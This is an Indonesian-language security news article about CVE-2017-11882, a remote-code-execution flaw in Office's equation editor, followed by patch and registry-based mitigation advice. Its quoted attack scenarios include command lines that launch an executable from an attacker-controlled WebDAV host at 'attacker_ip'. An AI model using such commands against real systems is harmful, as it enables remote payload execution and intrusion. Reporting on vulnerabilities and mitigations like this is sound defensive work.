Ketika dunia masih menghadapi ancaman fitur DDE Microsoft Office yang masih unpatched, para periset telah menemukan masalah serius lainnya terkait dengan komponen Office yang memungkinkan penyerang menginstal malware secara remote ke komputer yang ditargetkan.
Kerentanannya adalah masalah memory-corruption Microsoft Office semua versi yang dirilis dalam 17 tahun terakhir, termasuk Microsoft Office 365, dan bekerja melawan semua versi sistem operasi Windows, termasuk Microsoft Windows 10 Creators Update.
Ditemukan oleh periset keamanan di Embedi, kerentanan mengarah pada remote code execution, yang memungkinkan penyerang untuk mengeksekusi kode berbahaya pada sistem yang ditargetkan tanpa memerlukan interaksi pengguna setelah membuka dokumen berbahaya.
Kerentanan, yang diidentifikasi sebagai CVE-2017-11882, berada di EQNEDT32.EXE, komponen MS Office yang bertanggung jawab untuk penyisipan dan pengeditan persamaan (objek OLE) dalam dokumen.
Namun, karena operasi memori yang tidak tepat, komponen gagal menangani dengan benar di memori, merusaknya sedemikian rupa sehingga penyerang bisa mengeksekusi kode berbahaya dalam konteks pengguna yang log-in.
Tujuh belas tahun yang lalu, EQNEDT32.EXE diperkenalkan di Microsoft Office 2000 dan telah disimpan di semua versi yang dirilis setelah Microsoft Office 2007 untuk memastikan perangkat lunak tetap kompatibel dengan dokumen versi lama.
DEMO: Eksploitasi Memungkinkan Pengambil Alihan Sistem Secara Penuh
https://youtu.be/LNFG0lktXQI
Eksploitasi kerentanan ini memerlukan pembukaan file berbahaya yang dibuat khusus dengan versi perangkat lunak Microsoft Office atau Microsoft WordPad yang terpengaruh.
Kerentanan ini dapat dimanfaatkan untuk mengambil kendali penuh atas sistem bila dikombinasikan dengan eksploitasi privilege escalation kernel Windows (seperti CVE-2017-11847).
Kemungkinan Skenario Serangan:
Saat menjelaskan cakupan kerentanan, periset Embedi menyarankan beberapa skenario serangan yang tercantum di bawah ini:
“Dengan memasukkan beberapa OLE yang mengeksploitasi kerentanan yang dijelaskan, adalah mungkin untuk melakukan serangkaian perintah arbitrary (mis., Untuk mendownload file arbitrary dari Internet dan menjalankannya).”
“Salah satu cara termudah untuk mengeksekusi kode arbitrary adalah dengan meluncurkan file eksekusi dari server WebDAV yang dikendalikan oleh penyerang.”
“Meskipun demikian, penyerang dapat menggunakan kerentanan yang dijelaskan untuk menjalankan perintah seperti cmd.exe /c start \\attacker_ip\ff. Perintah seperti itu dapat digunakan sebagai bagian dari eksploitasi dan pemicu memulai WebClient.”
“Setelah itu, penyerang dapat memulai file eksekusi dari server WebDAV dengan menggunakan perintah \\attacker_ip\ff\1.exe. Mekanisme awal eksekusi file sama dengan \\live.sysinternals.com\tools service.”
Perlindungan Terhadap Kerentanan Microsoft Office
Dengan rilis patch bulan ini, Microsoft telah membahas kerentanan ini dengan mengubah bagaimana perangkat lunak yang terpengaruh menangani objek di memori.
Jadi, pengguna sangat disarankan untuk menerapkan patch keamanan November sesegera mungkin untuk mencegah hacker dan penjahat dunia maya.
Karena komponen ini memiliki sejumlah masalah keamanan yang dapat dengan mudah dieksploitasi, melumpuhkannya bisa menjadi cara terbaik untuk memastikan keamanan sistem.
Pengguna dapat menjalankan perintah berikut di command prompt untuk menonaktifkan pendaftaran komponen di registri Windows:
reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400
Untuk paket Microsoft Office 32-bit di OS x64, jalankan perintah berikut ini:
reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400
Selain itu, pengguna juga harus mengaktifkan Protected View (sandbox Microsoft Office) untuk mencegah eksekusi konten aktif (OLE/ActiveX/Macro).
